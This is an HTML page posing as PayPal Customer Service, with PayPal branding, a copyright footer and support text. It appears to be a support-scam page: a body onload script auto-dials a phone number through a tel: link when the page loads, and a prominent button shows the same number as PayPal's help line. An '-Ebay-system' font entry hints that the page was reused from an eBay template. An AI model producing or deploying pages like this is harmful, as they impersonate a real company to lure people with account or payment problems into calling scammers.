<!DOCTYPE html>
<html>

<head>
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>PayPal Customer Service</title>
  <style>
    body {
      font-family: "SF Pro Text", -Ebay-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen, Ubuntu, Cantarell, "Open Sans", "Helvetica Neue", sans-serif;
      text-align: center;
      padding: 0;
      background-color: #f5f5f7;
      margin: 0;
    }
    .cssimage {
  background-image: url('helpdesk.webp'); /* Replace with your image URL */
  height: 100vh;  /* Adjust height as needed */
  background-color: #cccccc;
  background-position: left;
  background-repeat: no-repeat;
  background-size: cover;
  position: relative;
}

    h1 {
      font-size: 32px;
      margin-bottom: 20px;
    }

    p {
      font-size: 18px;
      line-height: 1.5;
      margin-bottom: 30px;
    }

    .dsp {
      padding: 10px 100px;
    }

    .call-button {
      display: inline-block;
      background-color: #139ad6;
      color: #fff;
      padding: 15px 30px;
      font-size: 24px;
      border-radius: 5px;
      text-decoration: none;
      transition: background-color 0.3s ease;
      margin-bottom: 20px;
    }

    .call-button:hover {
      background-color: #232c65;
    }

    .paypalg {
      width: 250px;
      padding-top: 100px;
      margin-bottom: 30px;
    }

    @media(max-width: 800px) {
      .dsp {
        padding: 10px 10px;
      }
    }

    .footer {
      font-size: 14px;
      color: #888;
      margin-top: 50px;
    }
  </style>

</head>
<script>
  function autoDial() {
    var phoneNumber = "+18443384840";
    window.location.href = "tel:" + phoneNumber;
  }

  function call() {
    // Implement the call functionality here, such as initiating a phone call.
    console.log("Calling...");
  }
</script>

<body onload="autoDial()">
  <div class="cssimage">
    <img src="paypal.png" alt="logo" class="paypalg">
    <br>
    <a href="tel:+18443384840" class="call-button">+1 (844)-338-4840</a>
    <div class="dscenter">
      <h1>PayPal Customer Service</h1>
      <p class="dsp">If you need assistance or have any inquiries regarding PayPal products or services, our dedicated
        customer service team is here to help. Whether you need support with your PayPal account, have questions about
        payments or transactions, need help resolving disputes or refunds, or require guidance on using PayPal services,
        our experts are ready to assist. Enjoy exceptional support with PayPal Customer Service.</p>
    </div>
    <p class="footer">© 2024 PayPal. All rights reserved.</p>
  </div>

</body>

</html>